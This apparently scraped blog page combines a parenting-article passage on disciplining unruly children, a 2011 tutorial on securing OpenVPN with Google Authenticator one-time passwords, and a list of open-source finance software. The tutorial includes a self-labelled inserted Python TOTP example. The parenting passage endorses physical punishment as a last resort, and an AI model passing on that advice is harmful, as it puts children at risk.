لذا فإن استخدام الضرب مع الطفل المشاكس في بعض الأسر يظهر عجزها عن الحلول المناسبة، لأنهم يجدون الوسيلة الأسرع لحل الإشكال، وإن كان هذا السلوك مقبولا أو نجد له مبررا عند الأسر البسيطة التي لا تملك الوعي الكافي فإن الغريب أن هذا ما يحدث أيضا في الأسر التي تملك مؤهلات ثقافية واجتماعية جيدة ..
A Prescription for Change
To redirect this creative energy in your unruly child properly, so that unruliness is turned into a path of advancement, learning and development, Dr. Mohamed Ali Kamel (Professor of Educational Psychology at the Faculty of Education, Tanta University) advises you to follow some steps:
1- Let your child feel that you are observing his behaviour (by looking, approaching, touching and gesturing). A child's sense that adults are following him makes him monitor his own behaviour, so he does not persist in the rejected behaviour; if he senses that his parents or teachers are not paying attention, he continues the same behaviour.
2- Overlook the small mistakes that your son makes for the first time, which are aimed at attracting his parents' attention and enjoying the adults' comments, or at exploiting his ability to provoke their anger.
3- Do not ignore a big mistake that cannot be passed over in silence, even if he commits it for the first time.
4- Teach your child to play and encourage him to do so in a considered way; besides being one of the means of expression, play is also a way in which behavioural mistakes are treated.
5- Be aware that the unruly child enjoys watching his brother being punished and bursts out laughing, stirring feelings of hatred and resentment in his brother. So when your child tells you about mistakes his brother has committed, do not encourage him by punishing the brother at fault, because in doing so you will have reinforced backbiting or tale-bearing in him. Explain to him that this behaviour is called tale-bearing and that it is forbidden in our true religion.
6- These measures may not bring about the desired change, especially in the case of acute behaviour that results from the child's anger or from his enjoyment of this behaviour, so he must be ordered to stop it, with an explanation of the harm it does to others.
7- Warn him of the consequences of his action if the previous measure is not enough and the child returns to the same behaviour, and alert him that if he continues to do the same thing the consequences will be severe and unpleasant.
Rules for Punishment
These methods meet with a good response in many cases, and it is better to resort to them before rushing to punish a child who did not respond at the first warning. But if your son's unruliness continues and he does not respond to your advice, there is no avoiding punishing him, provided you choose a suitable punishment that stays away from physical punishment.
Examples of such punishments:
1- Depriving the child of one of his privileges if he continues the same behaviour.
2- Having him repair what he damaged as far as possible, for example by cleaning the place or providing a replacement out of his own pocket money.
3- Isolating the child in a room alone for a limited time if he engages in aggressive behaviour that harms others, such as hitting others, kicking, pushing, scratching, threatening or insulting; isolating the child in his room for a limited period of time has an effective result.
4- Express your disapproval of your child's unacceptable behaviour, either in words or through various gestures such as facial expression, provided that the reprimand is directed at the child's behaviour and not at him as a person.
We come to the last of the solutions, physical punishment, as the remedy of last resort. When the child does not agree to give up his rejected behaviour, there is then no avoiding the use of punishment to correct his behaviour, while following these rules:
1- The punishment should be proportionate to the offence.
2- The punishment should be applied after the offence is committed; postponing it for a long or short period makes it lose its meaning and benefit.
3- Punishment may only be applied after the child has been made aware of his mistake and given a chance to stop.
4- Reduce punishment as much as you can, and use it gradually, starting from the mildest and moving to the more severe.
5- Stay away from emotional outbursts when you punish him, and do not let the punishment extend so that it turns into humiliation or an affront to his dignity.
6- Finally, and most importantly, do not punish the child in front of his friends or siblings.

Read the original article on the Al-Wafd electronic portal: Your Unruly Child: Steps for Coping

Thursday, July 14, 2011

Securing OpenVPN With A One Time Password (OTP) On Ubuntu

So, you got yourself a nice OpenVPN box. People need to log in with their certificates but... if their laptop is stolen, anyone could log in. Sure, you could add a password login, but that's a bit outdated. The solution for this is using an OTP (one time password).
This technique is being used by a lot of large corporations including banks. This tutorial shows you how to configure OpenVPN to add additional security.
This assumes you already have OpenVPN configured and working properly.

Getting the Google Authenticator

First we need to download the Google Authenticator code. This can be done using "hg". You might need to install Mercurial; if so, it's as easy as:
apt-get install mercurial
We also need some compile tools, so let's install a package of compilers (you can remove this when we're done):
apt-get install build-essential
Let's check out the source code for the Google Authenticator system and change into the libpam directory inside the checkout:
cd /tmp && hg clone https://google-authenticator.googlecode.com/hg/ google-authenticator && cd google-authenticator/libpam
Ok, nice, so we now got it checked out. In order to make it work properly with OpenVPN we need to change the Makefile.
vim Makefile
Add the following line after the license part and before the .SUFFIXES:
LDFLAGS="-lpam"
Save the file and let's proceed, shall we? We need to compile this, which is easy:
make
No errors? Good, you can just proceed. You might, however, get an error about "displayQRCode". If so, you will need to make some changes to the Makefile. First find where libdl.so lives on your system:
find /usr/lib -name libdl.so
In the Makefile, replace all 3 references to "/usr/lib/libdl.so" with the path you got (e.g. "/usr/lib/i386-linux-gnu/libdl.so"). Save it and re-run make. You should now be able to proceed just fine.
If it compiled successfully, proceed with installing it:
make install
We're done, let's proceed shall we?

Configuring OpenVPN to use PAM

Open up /etc/openvpn/server.conf and add the following line:
plugin /usr/lib/openvpn/openvpn-auth-pam.so openvpn
This will use PAM to provide additional means of authentication. The last part (openvpn) is the file in /etc/pam.d we'd like to use. Since we do not want it to interfere with other services (e.g. SSH or sudo) we just use a new file.
Restart OpenVPN to have it re-read the config file.

Configure PAM to authenticate using Google Authenticator

Create the file /etc/pam.d/openvpn:
cp /etc/pam.d/common-account /etc/pam.d/openvpn
vim /etc/pam.d/openvpn
Add the following line:
auth    required                        pam_google_authenticator.so
If you are using encrypted home directories, you will need to change that to:
auth    required                        pam_google_authenticator.so secret=/var/unencrypted-home/${USER}/.google_authenticator
We're finished with the PAM config. Obviously you can make it a lot more complex, for example by adding IP restrictions (no OTP on trusted IPs) or adding more security.

Configure Google Authenticator

Ok, so we have almost everything in place but the proper config. This should be done per user. Log in as the user (either with su - username or directly) and issue the command:
google-authenticator
This will present you with a few questions:
https://www.google.com/chart?chs=200x200&chld=M|0&cht=qr&chl=otpauth://totp/me@myserver%3Fsecret%XXXXXXXXXXXXX
Your new secret key is: XXXXXXXXXXXXXXXXX
Your verification code is 1234567
Your emergency scratch codes are:
11111111
22222222
33333333
44444444
55555555
Do you want me to update your "~/.google_authenticator" file (y/n)
Save the URL & info as we will need that later. Answer "y" and you will get the next question:
Do you want to disallow multiple uses of the same authentication
token? This restricts you to one login about every 30s, but it increases
your chances to notice or even prevent man-in-the-middle attacks (y/n)
You should also answer Y(es) here, as it's far more secure to disallow reusable keys. Answer accordingly and the next question pops up:
By default, tokens are good for 30 seconds and in order to compensate for
possible time-skew between the client and the server, we allow an extra
token before and after the current time. If you experience problems with poor
time synchronization, you can increase the window from its default
size of 1:30min to about 4min. Do you want to do so (y/n)
30 seconds might not be too long, so we could increase the time limit. For me, 30 seconds is enough so I just answer N(o) here.
The final question:
If the computer that you are logging into isn't hardened against brute-force
login attempts, you can enable rate-limiting for the authentication module.
By default, this limits attackers to no more than 3 login attempts every 30s.
Do you want to enable rate-limiting (y/n)
For additional security you should answer (Y)es here.
Ok, done! In case you do have encrypted home directories, you will need to do one additional step. Until they've implemented support for encrypted home directories, you will have to put the .google_authenticator file outside of the encrypted home folders.
Execute:
mkdir -p /var/unencrypted-home/${USER}/
cp .google_authenticator /var/unencrypted-home/${USER}/
chmod og-rwx /var/unencrypted-home/${USER}/ -R
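To make the three yes/no questions above concrete, here is an added Python example (not part of the original tutorial and not the PAM module's own code) of how a time-based one-time password is computed per RFC 6238 and how disallowing reuse, the one-token window and rate limiting affect verification. The class TotpVerifier, its parameters and SAMPLE_SECRET (the public RFC test key) are assumptions made for illustration.

```python
import base64
import hashlib
import hmac
import struct
import time

STEP = 30    # seconds each token is valid for (the default in the prompt)
DIGITS = 6   # length of the passcode typed into the VPN client

# Constructed sample: the published RFC 4226/6238 test key, base32-encoded.
# Never use it for real; a real secret lives in ~/.google_authenticator.
SAMPLE_SECRET = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"


def hotp(secret_b32, counter, digits=DIGITS):
    """RFC 4226 one-time password for a single counter value (HMAC-SHA1)."""
    cleaned = secret_b32.replace(" ", "").upper()
    key = base64.b32decode(cleaned + "=" * (-len(cleaned) % 8))
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                      # dynamic truncation
    value = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % 10 ** digits).zfill(digits)


def totp(secret_b32, now):
    """RFC 6238: HOTP with the counter set to the current 30 s time step."""
    return hotp(secret_b32, int(now) // STEP)


class TotpVerifier:
    """Simplified model of the three choices (hypothetical helper)."""

    def __init__(self, secret_b32, window=1, disallow_reuse=True,
                 rate_limit=(3, 30)):
        self.secret = secret_b32
        self.window = window              # extra tokens accepted either side
        self.disallow_reuse = disallow_reuse
        self.rate_limit = rate_limit      # (max attempts, per seconds) or None
        self.used_steps = set()           # time steps already spent
        self.attempts = []                # timestamps of recent attempts

    def verify(self, code, now=None):
        """Return 'ok', 'invalid', 'reused' or 'rate-limited'."""
        now = time.time() if now is None else now
        if self.rate_limit is not None:
            limit, period = self.rate_limit
            self.attempts = [t for t in self.attempts if now - t < period]
            if len(self.attempts) >= limit:
                return "rate-limited"
            self.attempts.append(now)
        if not (code.isascii() and code.isdigit() and len(code) == DIGITS):
            return "invalid"
        current = int(now) // STEP
        first = max(0, current - self.window)
        # window=1 means three candidate tokens, i.e. the 1:30 min default.
        for step in range(first, current + self.window + 1):
            # Constant-time comparison avoids leaking how many digits matched.
            if hmac.compare_digest(hotp(self.secret, step), code):
                if self.disallow_reuse and step in self.used_steps:
                    return "reused"
                self.used_steps.add(step)
                return "ok"
        return "invalid"


if __name__ == "__main__":
    verifier = TotpVerifier(SAMPLE_SECRET, rate_limit=None)
    code = totp(SAMPLE_SECRET, 59)
    print("code at t=59:", code)
    print("first use:   ", verifier.verify(code, now=59))
    print("replay:      ", verifier.verify(code, now=65))
    print("after window:", TotpVerifier(SAMPLE_SECRET).verify(code, now=120))
```

With reuse disallowed, a passcode captured in transit is worthless once the legitimate login has spent it, which is why the tutorial answers Y to that question.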

Configuring the client

The client should have password logins as an additional means of security. If you are using the NetworkManager add-in for OpenVPN, you can just switch it to certificate + password; otherwise you will have to enable "auth-user-pass" in your VPN client config.

Wrapping up

Ok, so now we have:
  1. Installed Google Authenticator PAM module
  2. Enabled PAM support for OpenVPN
Install the Google Authenticator app. Instructions for each mobile platform (Android, iOS, BlackBerry) can be found on the Google Knowledgebase.
Once you have installed the app, have it scan the barcode. The URL we received earlier (the google.com/chart... one) provides a QR code we can scan. Once we scan it, it will automatically configure the client.
So, the next time you log in to your OpenVPN server you will be prompted for an additional password. Provide the 6 digit passcode and you will gain access.

Wednesday, July 13, 2011

63 Open Source Replacements for Popular Financial Software

Whether you're looking for financial software to manage your personal finances, your small business or for a large enterprise, the open source community offers a lot of options.

The business-focused products are particularly robust, with a huge list of solutions, many of which offer commercial support and/or hosting.

We last updated our list of open source replacements for popular financial software about a year ago. This year, we've revisited the list, updating links and details and adding quite a few projects that we haven't featured before.

Please note that the applications are not listed in order of their quality or usefulness. Instead, they're organized by category and listed alphabetically within those categories.

As always, please feel free to suggest any open source financial software that we might have missed in the comments section below.

Accounting

1. Edoceo Imperium Replaces QuickBooks, Sage Peachtree
For small to medium-sized businesses, this Web-based accounting system includes basic CRM, job tracking and invoicing capabilities, as well as double-entry accounting. It also integrates with Google Calendar, Gmail and Google Maps.
Operating System: OS Independent

2. FrontAccounting Replaces QuickBooks Online
This Web-based accounting system also offers some ERP features like inventory and manufacturing modules. You can deploy it on your own Web server for free or use the fee-based on-demand version.
Operating System: OS Independent

3. GnuCash Replaces Quicken Home and Business
A good option for small business owners, GnuCash combines the features of a business accounting package with the features of a personal financial manager. Key capabilities include double-entry accounting, investment management, invoicing, accounts payable, accounts receivable, Quicken data import and more.
Operating System: Windows, Linux, OS X

4. Lazy8 Ledger Replaces QuickBooks, Sage Peachtree, Microsoft Excel
Best for very small businesses, Lazy8 Ledger offers an alternative to doing your books by hand or with a simple spreadsheet program. However, it lacks the advanced features that larger companies are likely to need.
Operating System: Windows, Linux, OS X

5. LedgerSMB Replaces QuickBooks, Sage Peachtree
Also designed for small to medium-sized businesses, LedgerSMB includes general ledger, accounts payable and accounts receivable capabilities. It was originally based on the SQL-Ledger code and also offers some basic ERP functionality.
Operating System: Windows, Linux, OS X

6. osFinancials Replaces QuickBooks, Sage Peachtree
With an emphasis on simplicity, osFinancials aims to take the complications out of business accounting software. It can track up to 9999 accounts, 1 million creditors and debtors and 1 million stock items. Note: because it is developed by a team in the Netherlands, a lot of the osFinancials Web site and documentation is in Dutch, but English is also available.
Operating System: Windows, Linux

7. TurboCASH Replaces QuickBooks, Sage Peachtree
Designed for small business owners, this alternative to QuickBooks and Sage offers a helpful feature comparison chart. It boasts more than 80,000 users, and although it was developed in the U.K., it has a chart of accounts and other features adapted for U.S. users as well.
Operating System: Windows

8. XIWA Replaces QuickBooks, Sage Peachtree
Short for "XIWA is Web accounting," XIWA is a mature, 12-year-old project with interfaces both for those who understand double-entry accounting and those who don't. It can handle multiple sets of books and multiple users, and it includes both payroll and investment tracking capabilities.
Operating System: Linux

Billing and Invoicing

9. Argentum Replaces FreshBooks, Bill.com
This Web-based app offers basic client management, invoicing and time tracking functionality. It's free to download and host on your own Web server, or you can use the service in the cloud for $10 per month.
Operating System: OS Independent

10. jBilling Replaces QuickTel
Designed for telecoms and companies that offer subscription-based services, jBilling boasts thousands of downloads per month. The software is available for free, but consulting, support and training require a fee.
Operating System: OS Independent

11. Simple Invoices Replaces FreshBooks, Bill.com
With this Web-based invoicing system, you can easily send your clients PDF invoices or create basic reports that let you track your sales. You can download the free version to a PC or a server, or you can purchase access on an SaaS basis from one of the third-party hosting providers listed on the site.
Operating System: OS Independent

12. Siwapp Replaces FreshBooks, Bill.com
This Web app was designed to be as simple as possible and offers a very easy-to-use interface. It creates attractive, professional-looking invoices that you can send to your clients and easy-to-understand reports that you can use to manage your small business.
Operating System: OS Independent

Business Intelligence (BI)

13. Jaspersoft Replaces SAP Netweaver, SAS, Oracle Business Intelligence, Cognos
The self-proclaimed "world's most widely used business intelligence software," Jaspersoft offers reporting, data analysis, data integration and dashboard functionality. In addition to two free community versions (Jaspersoft BI Community Edition and JasperReports Community Edition), it comes in four commercial editions: Jaspersoft BI Enterprise Edition, Jaspersoft BI Professional Edition, Jaspersoft BI Express Edition and JasperReports Professional.
Operating System: OS Independent

14. JMagallanes Replaces LogiXML, DBxtra
This Java-based app is based in part on JasperReports and JFreeChart. It reads from a number of data sources (SQL, Excel, XML and others) to create a variety of charts and tables.
Operating System: OS Independent

15. Palo BI Suite Replaces SAP Netweaver, SAS, Oracle Business Intelligence, Cognos
Used by more than 45,000 companies, Palo extends the capabilities of Microsoft Excel with OLAP technology. It's available in both community and premium editions, and you can also purchase a Palo mobile app for your smartphone or tablet.
Operating System: OS Independent

16. Pentaho Replaces SAP Netweaver, SAS, Oracle Business Intelligence, Cognos
Pentaho calls itself "the open source business intelligence leader," and claims to cut BI licensing costs by 90 percent. It comes in community or enterprise editions, and it's also available on an SaaS basis.
Operating System: Windows, Linux, OS X

E-Commerce
17. Broadleaf Commerce Replaces Big Commerce, Volusion, Yahoo Merchant
Broadleaf bills itself as "the most cost-effective enterprise e-commerce solution available." It's Java-based, easy-to-use, and integrates with Facebook and Twitter, as well as most databases and back-end systems.
Operating System: Windows, Linux, OS X

18. Magento Replaces Big Commerce, Volusion, Yahoo Merchant
Now owned by eBay, Magento is used by more than 100,000 merchants, including OfficeMax, Nokia, Harbor Freight Tools, The North Face and others. In addition to the free community version, it comes in professional or enterprise editions, and Magento Go offers hosting services.
Operating System: Windows, Linux

19. nopCommerce Replaces Big Commerce, Volusion, Yahoo Merchant
This .NET-based e-commerce package offers fast installation, search engine optimization, and maximum flexibility. It's PCI DSS compliant and supports features like anonymous checkout, gift cards, multiple currencies, live chat, inventory tracking, cross-selling, coupons, discounts and multiple payment and shipping options.
Operating System: Windows

20. osCommerce Replaces Big Commerce, Volusion, Yahoo Merchant
With more than 248,700 users and 10 years of development, osCommerce is a very popular, mature e-commerce solution. The site offers a showcase of more than 12,700 sites that have been developed using osCommerce, as well as an online demo.
Operating System: Windows, Linux, OS X

21. PrestaShop Replaces Big Commerce, Volusion, Yahoo Merchant
Award-winning PrestaShop is used by more than 75,000 different companies, and it's the number one open source e-commerce solution in Europe. It offers more than 265 features which you can see for yourself with the online demo.
Operating System: Windows, Linux, OS X

22. Order Portal Replaces Mainstreet Commerce, Yahoo Merchant
Order Portal is part of Randr Inc's Web Business Suite (WBS) for manufacturers, distributors and rental companies. It integrates with Google and PayPal and offers a long list of features, but it isn't quite as polished as some of the other open source e-commerce solutions on our list.
Operating System: Linux

23. Zen Cart Replaces Big Commerce, Volusion, Yahoo Merchant
Designed in part by online merchants, Zen Cart offers an intuitive interface for users without a background in programming or a degree in IT. Notable features include a newsletter manager, discount coupons, gift certificates, featured products, quantity discounts and more.
Operating System: Windows, Linux

Enterprise Resource Planning (ERP)
24. ADempiere ERP Business Suite Replaces SAP, Microsoft Dynamics
This fork of Compiere (see below) includes ERP, CRM and SCM capabilities. The link above offers the software download, but adempiere.com offers a wiki with a lot of other documentation for the project.
Operating System: Windows, Linux, OS X

25. Apache OFBiz Replaces NetSuite, Sage ERP
Sponsored by the Apache Software Foundation, the Open For Business Suite (OFBiz for short) incorporates ERP, CRM, e-commerce, SCM, MRP (manufacturing resources planning), CMMS/EAM (maintenance management system/enterprise asset management), POS and other capabilities. It's easy to customize the various components to your own needs, and the site offers a great deal of documentation and support.
Operating System: OS Independent

26. Compiere ERP + CRM Business Solution Replaces SAP, Microsoft Dynamics
Now owned by Consona Corporation, Compiere is a full-featured ERP solution that boasts TCO savings up to 80 percent versus commercial software. In addition to the free community version, it also comes in paid standard, professional and enterprise editions.
Operating System: Windows, Linux, OS X

27. Dolibarr ERP/CRM Replaces NetSuite, Sage ERP
Like NetSuite and Sage, Dolibarr ERP/CRM meets the needs of SMBs, foundations and freelancers. The website offers screenshots and an online demo so that you can see how it works. The basic software is free, but additional modules and add-ons are available through the Dolistore.
Operating System: OS Independent

28. EdgeERP Replaces NetSuite, Sage ERP
This fork of WebERP (see below) offers flexibility and the ability to integrate with many other types of software. Small businesses can use it to manage sales quotes, orders, invoicing, receivables, inventory, purchases, payables, banking, and general ledger accounting.
Operating System: OS Independent

29. ERP5 Replaces SAP, Microsoft Dynamics
ERP 5 includes ERP, CRM, MRP, SCM, accounting, HR and PDM capabilities. It comes in a free community version, a supported enterprise version and an SaaS version called TioLive.
Operating System: Linux

30. JFire Replaces NetSuite, Sage ERP
This Java-based ERP system comes ready-to-use with a full set of features, but can also be customized to meet your company's unique needs. It includes both ERP and CRM functionality and also comes in a version for service-based businesses. Additional information about the software can be found on the JFire community site or on the NightLabs site, which also offers support and services for JFire.
Operating System: OS Independent

31. Neogia Replaces NetSuite, Sage ERP
Another SMB tool, Neogia includes CRM, sub-contracting, manufacturing, finance, e-commerce, distribution and inventory management capabilities. Be warned that much of the documentation and website for this project is in French.
Operating System: Windows, Linux

32. Openbravo ERP Replaces SAP, Microsoft Dynamics
Downloaded more than 2 million times, Openbravo's ERP software emphasizes agility. It's available in three different editions: community, basic or professional. (Professional comes with paid support and is only available through an Openbravo partner.)
Operating System: OS Independent

33. Open ERP Replaces SAP, Microsoft Dynamics
This modular solution incorporates CRM, accounting, point of sale, project management, warehouse management, human resources, purchasing, manufacturing, marketing, invoicing and an application builder. Visit the site to see how it compares with other open-source ERP solutions, as well as SAP and Microsoft Dynamics. In addition to the free version, it's available in several commercial editions or on an SaaS basis from Odoo.
Operating System: Windows, Linux

34. opentaps Replaces SAP, Microsoft Dynamics
Used by Toyota, Honeywell and other well-known companies, Opentaps bills itself as "the most advanced Open Source ERP + CRM solution." It's available with either an open source license or a commercial license that includes support, and it's also available in the cloud through Amazon Web Services.
Operating System: Windows, Linux

35. Phreedom Replaces NetSuite, Microsoft Dynamics
This Web-based project for small businesses includes the PhreeBooks accounting software, plus modules for contacts, inventory, payment, report generation, help, and shipping. Other additional modules are available for a fee.
Operating System: OS Independent

36. Plazma ERP + CRM Replaces NetSuite, Sage ERP
This multi-function suite for SMBs offers a lot of CRM capabilities, along with a few ERP functions. The interface is bare-bones but easy to use, and while it comes with quite a bit of documentation, no paid support is available.
Operating System: Windows, Linux, OS X

37. Postbooks/xTuple ERP Replaces NetSuite, Sage ERP
xTuple's ERP suite includes accounting, sales, CRM, purchasing, product definition, inventory and distribution, light manufacturing and reporting capabilities. The Postbooks edition is available with either an open source or a commercial license, and the Standard, Project, Manufacturing or Enterprise editions are available only with a commercial license. It's also available in the cloud, and information about other related services is also on the website.
Operating System: Windows, Linux, Unix, OS X

38. ]project-open[ Replaces SAP, Microsoft Dynamics
Designed for businesses with 3 to 3,000 employees, this application combines project management, service management and ERP functionality. And it boasts a client base of 3000 companies in 80 countries. Note that the full software is released under a mixed license, that is, parts are open-source, parts are available under a free commercial license, and parts are only available under a fee-based commercial license.
Operating System: OS Independent

39. SQL-Ledger Replaces NetSuite, Sage ERP
Another Web-based application, SQL-Ledger features double-entry accounting and ERP features and, as you might guess, stores data in a SQL database server. Paid support is available at a variety of price points.
Operating System: Windows, Linux, OS X

40. webERP Replaces NetSuite, Sage ERP
This popular app is downloaded an average of 5,000 times per month. While it can be used by any type of business, webERP is particularly well suited to the needs of wholesalers, distributors and manufacturing companies. Commercial support and hosting are available through third-party organizations.
Operating System: OS Independent

Human Resource Management (HRM)
41. Orange HRM Replaces iVantage, iCIMS
With more than 1 million users, Orange claims to be the "world’s most popular Open Source Human Resource Management Software." It tracks time and attendance, leave, recruiting performance, and employee information, and it's also available in an SaaS version.
Operating System: Windows, Linux, Unix, OS X

42. WaypointHR Replaces Epicor HCM, iCIMS
While not as mature as Orange, Waypoint also tracks employee records, pay, performance, leave and other HR information. Also, like Orange, it's available in a hosted "On Demand" version.
Operating System: OS Independent

Investment Tracking and Management
43. Chartsy Replaces StockMarketEye, Personal Stock Monitor, TradeTrakker
This stock charting and screening platform features a modular architecture that lets you install only the capabilities you need. The project owners plan to add trading capabilities in the future, but they aren't operational yet.
Operating System: Windows, Linux, OS X

44. JStock Replaces StockMarketEye, Personal Stock Monitor, TradeTrakker
For active investors, this app offers a stock watchlist, portfolio management, alerts, filters, charts, chat and more. It can track 26 stock markets around the world, and it can save your data in the cloud if you like.
Operating System: Windows, Linux, OS X

Microfinance
45. Mifos Replaces Loan Performer, Temeno Microfinance & Community Banking
This Web-based management information system (MIS) aims to help microfinance institutions streamline their operation. It offers portfolio and transaction management, on-the-fly financial product creation, in-depth client management, integrated social performance measurement, and a reporting engine.
Operating System: OS Independent

46. Octopus Replaces Loan Performer, Temeno Microfinance & Community Banking
Rated as "one of the most user-friendly solution with highly ergonomic windows display" by the World Bank/CGAP, Octopus offers a robust, secure MIS for microfinance organizations. It's available both in a free community version or a supported professional edition.
Operating System: Windows

Personal Financial Management
47. Buddi Replaces Quicken, Mint.com
Calling itself “personal budget software for the rest of us,” Buddi offers very simple installation and operation for users with little financial background. It's won multiple awards, but does not offer the same type of advanced features as Quicken.
Operating System: OS Independent

48. Grisbi Replaces Quicken Home and Business
While it doesn't offer double-entry accounting, Grisbi offers some business accounting features in addition to all the features you would expect in a personal finance manager. It's available in multiple languages and can handle multiple currencies.
Operating System: Windows, Linux

49. HomeBank Replaces Quicken, Mint.com
Under development since 1995, HomeBank offers an intuitive interface and easy-to-use reporting capabilities. Like many of the other apps on our list, it can import financial data from other sources, autocompletes entries whenever possible and provides budgeting capabilities.
Operating System: Linux

50. JGnash Replaces Quicken, Mint.com
Java-based JGnash supports double-entry or single-entry bookkeeping, account reconciliation, PDF report generation, multiple currencies, check printing and more. It can also import data from commercial financial software or online banking systems.
Operating System: Windows, Linux, OS X

51. KMyMoney Replaces Quicken, Mint.com
KDE's personal finance software is particularly user-friendly, with an interface that's easy for anyone who's used Quicken or similar software to understand. Previous versions of the software only worked on Linux, but the latest version also supports Windows (though it isn't completely stable).
Operating System: Windows, Linux, OS X

52. Money Manager Ex Replaces Quicken, Mint.com
This app claims to offer "all the basic features that 90% of users would want to see in a personal finance application." Notable features include AES encryption, the ability to run from a thumb drive without an install, depreciation tracking, international support and import from CSV and Quicken file formats.
Operating System: Windows, Linux, OS X

53. Yapbam Replaces Quicken, Mint.com
Java-based Yapbam (short for "yet another bank account manager") is cross-platform, portable and extensible. It can import data from other software and online banking, automatically generates reports and includes a currency converter.
Operating System: Windows, Linux, OS X

Professional Services Automation (PSA)
54. allocPSA Replaces NetSuite OpenAir, Projector PSA, Q360
This web-based suite calls itself "the premier online professional services automation solution." Key features include bookkeeping, project management, a dashboard, time tracking, to do lists, CRM, calendar, and much more, all designed specifically to meet the needs of professional service organizations. It's also available on an SaaS basis starting at $199 per year.
Operating System: OS Independent

Point-of-Sale (POS)
55. Floreant POS Replaces QuickBooks Point of Sale, AccuPOS
Used by the Denny's chain in New York, this restaurant-specific POS application offers a full set of capabilities to support fine dining, carry out, tax, discounts, food grouping, drawer pull, kitchen ticket, ESC/POS receipt, combined payment system and sales reports. Two levels of commercial support are available, with prices varying based on response time and availability.
Operating System: OS Independent

56. LemonPOS Replaces QuickBooks Point of Sale, AccuPOS
Made for small, medium or micro businesses, LemonPOS integrates with scanners and thermal printers to track your store's sales. It stores data in a MySQL database, supports multiple terminals and offers good security including role-based permissions.
Operating System: Linux

57. POSper Replaces QuickBooks Point of Sale, AccuPOS
This app was designed for small retail stores and restaurants. It supports multiple touchscreens, scanners, card readers and ticket printers, and it integrates with all databases supported by Hibernate.
Operating System: OS Independent

Spreadsheets
58. Gnumeric Replaces Microsoft Excel, Lotus 1-2-3
This spreadsheet app for the Gnome desktop has been praised as more accurate than the leading proprietary spreadsheet. It can read existing files from Excel and similar programs, but is not meant to be a clone of any commercial program.
Operating System: Windows, Linux

59. KOffice KCells Replaces Microsoft Excel, Lotus 1-2-3
Formerly called "KSpread," this tool is part of KDE's KOffice suite. The interface has a menu on the right side of the screen that takes some getting used to, but it's easy to learn and has a very powerful formula builder tool.
Operating System: Windows, Linux

60. LibreOffice Calc Replaces Microsoft Excel, Lotus 1-2-3
Based on OpenOffice.org, LibreOffice offers a complete office productivity suite, including the Calc spreadsheet program. It offers a very mature set of advanced features and integrates with other database and spreadsheet software.
Operating System: Windows, Linux, OS X

61. OpenOffice.org Calc Replaces Microsoft Excel, Lotus 1-2-3
Very similar to Microsoft Excel, OpenOffice.org's Calc program is particularly easy to use. It also reads and writes to Excel and other spreadsheet file formats, making it suitable for business use.
Operating System: Windows, Linux, OS X

Time Tracking
62. eHour Replaces Replicon, Timesheet.com
Best for freelancers, lawyers, consultants, and other companies that bill by the hour, eHour tracks the time employees spend per project and per client. You can run it on a standalone system or you can install it on your Tomcat server for employees to access via a browser.
Operating System: Windows, Linux, OS X

63. TimeTrex Replaces Replicon, Timesheet.com
This self-proclaimed "world's most popular open source payroll and time management software" includes modules for scheduling, attendance, job costing and payroll. In addition to the free standard edition, it comes in multiple commercial editions that can be deployed on site or in the cloud.
Operating System: Windows, Linux, OS X